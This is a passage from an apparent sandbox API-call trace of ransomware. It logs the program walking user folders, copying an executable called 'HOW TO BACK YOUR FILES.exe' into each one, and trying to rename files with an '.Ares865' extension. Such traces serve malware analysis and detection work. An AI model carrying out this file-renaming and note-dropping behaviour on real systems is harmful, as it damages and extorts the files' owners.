Settings\\Application Data\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\history\\history.ie5\\index.dat"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\History\\History.IE5\\index.dat.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\history\\history.ie5\\index.dat.ares865"), dwFlags=0x1) returned 0 [0104.722] GetLastError () returned 0x20 [0104.722] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\History\\History.IE5\\index.dat MoveFileEx error 32\r\n") returned 121 [0104.722] lstrlenA (lpString="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\History\\History.IE5\\index.dat MoveFileEx error 32\r\n") returned 121 [0104.722] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0104.722] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x5d16 [0104.722] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0x79, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0x79, lpOverlapped=0x0) returned 1 [0104.723] CloseHandle (hObject=0x118) returned 1 [0104.723] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0104.723] CloseHandle (hObject=0x0) returned 0 [0104.723] CloseHandle (hObject=0x0) returned 0 [0104.723] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x3897c980, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4dd91240, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4dd91240, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSHist012019091320190914", cAlternateFileName="MSHIST~1")) returned 1 [0104.723] lstrcmpiW (lpString1="MSHist012019091320190914", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0104.723] lstrcmpiW (lpString1="MSHist012019091320190914", lpString2="aoldtz.exe") returned 1 [0104.723] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\History\\History.IE5\\MSHist012019091320190914", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\History\\History.IE5\\MSHist012019091320190914") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\History\\History.IE5\\MSHist012019091320190914" [0104.723] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c8eb8 | out: hHeap=0x2b0000) returned 1 [0104.723] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7808 | out: hHeap=0x2b0000) returned 1 [0104.723] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\History\\History.IE5\\MSHist012019091320190914") returned 106 [0104.723] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\History\\History.IE5\\MSHist012019091320190914" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\History\\History.IE5\\MSHist012019091320190914") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\History\\History.IE5\\MSHist012019091320190914" [0104.723] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.724] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\History\\History.IE5\\MSHist012019091320190914\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\history\\history.ie5\\mshist012019091320190914\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.724] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.724] GetLastError () returned 0x0 [0104.724] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.724] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.725] CloseHandle (hObject=0x120) returned 1 [0104.725] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0104.725] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.725] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\History\\History.IE5\\MSHist012019091320190914\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x3897c980, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4dd91240, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4dd91240, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.725] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.725] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.725] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\History\\History.IE5\\MSHist012019091320190914\\index.dat.Ares865") returned 124 [0104.725] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\History\\History.IE5\\MSHist012019091320190914\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\history\\history.ie5\\mshist012019091320190914\\index.dat"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\History\\History.IE5\\MSHist012019091320190914\\index.dat.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\history\\history.ie5\\mshist012019091320190914\\index.dat.ares865"), dwFlags=0x1) returned 0 [0104.725] GetLastError () returned 0x20 [0104.725] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\History\\History.IE5\\MSHist012019091320190914\\index.dat MoveFileEx error 32\r\n") returned 146 [0104.725] lstrlenA (lpString="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\History\\History.IE5\\MSHist012019091320190914\\index.dat MoveFileEx error 32\r\n") returned 146 [0104.725] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0104.726] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x5d8f [0104.726] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0x92, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0x92, lpOverlapped=0x0) returned 1 [0104.726] CloseHandle (hObject=0x118) returned 1 [0104.726] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0104.726] CloseHandle (hObject=0x0) returned 0 [0104.726] CloseHandle (hObject=0x0) returned 0 [0104.726] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x3897c980, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x3897c980, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x83c55340, ftLastWriteTime.dwHighDateTime=0x1d4d5ae, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="index.dat", cAlternateFileName="")) returned 0 [0104.727] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 [0104.727] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7c30 [0104.727] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google" [0104.727] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x320fc8 | out: hHeap=0x2b0000) returned 1 [0104.727] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c28 | out: hHeap=0x2b0000) returned 1 [0104.727] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google") returned 68 [0104.727] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google" [0104.727] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.727] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.727] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.728] GetLastError () returned 0x0 [0104.728] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.728] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.728] CloseHandle (hObject=0x120) returned 1 [0104.728] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0104.728] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.728] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6b0b7d20, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4dd91240, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4dd91240, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.728] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.728] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.728] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\CrashReports", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\CrashReports") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\CrashReports" [0104.728] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d7700 | out: hHeap=0x2b0000) returned 1 [0104.728] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7808 | out: hHeap=0x2b0000) returned 1 [0104.728] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\CrashReports") returned 81 [0104.728] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\CrashReports" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\CrashReports") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\CrashReports" [0104.728] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.728] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\CrashReports\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\crashreports\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.729] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.729] GetLastError () returned 0x0 [0104.729] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.729] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.730] CloseHandle (hObject=0x120) returned 1 [0104.730] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0104.730] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.730] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\CrashReports\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6b0b7d20, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4dd91240, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4dd91240, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.730] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.730] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.730] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome" [0104.730] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x335068 | out: hHeap=0x2b0000) returned 1 [0104.730] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c28 | out: hHeap=0x2b0000) returned 1 [0104.730] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome") returned 75 [0104.730] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome" [0104.730] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.730] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.731] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.731] GetLastError () returned 0x0 [0104.731] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.731] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.731] CloseHandle (hObject=0x120) returned 1 [0104.731] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0104.731] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.731] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7f572ae0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4ddb73a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ddb73a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.731] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.731] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.732] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data" [0104.732] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8890 | out: hHeap=0x2b0000) returned 1 [0104.732] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c28 | out: hHeap=0x2b0000) returned 1 [0104.732] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data") returned 85 [0104.732] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data" [0104.732] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.732] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.733] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.733] GetLastError () returned 0x0 [0104.733] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.733] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.733] CloseHandle (hObject=0x120) returned 1 [0104.733] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0104.734] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.734] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7f572ae0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6cf5cb00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6cf5cb00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.734] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.734] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.734] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\WidevineCdm", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\WidevineCdm") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\WidevineCdm" [0104.734] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ca138 | out: hHeap=0x2b0000) returned 1 [0104.734] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7cc8 | out: hHeap=0x2b0000) returned 1 [0104.734] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\WidevineCdm") returned 97 [0104.734] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\WidevineCdm" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\WidevineCdm") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\WidevineCdm" [0104.734] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.734] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\WidevineCdm\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\widevinecdm\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.735] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.735] GetLastError () returned 0x0 [0104.735] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.735] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.735] CloseHandle (hObject=0x120) returned 1 [0104.735] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0104.735] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.735] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\WidevineCdm\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81dfb250, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4dddd500, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4dddd500, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.735] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR 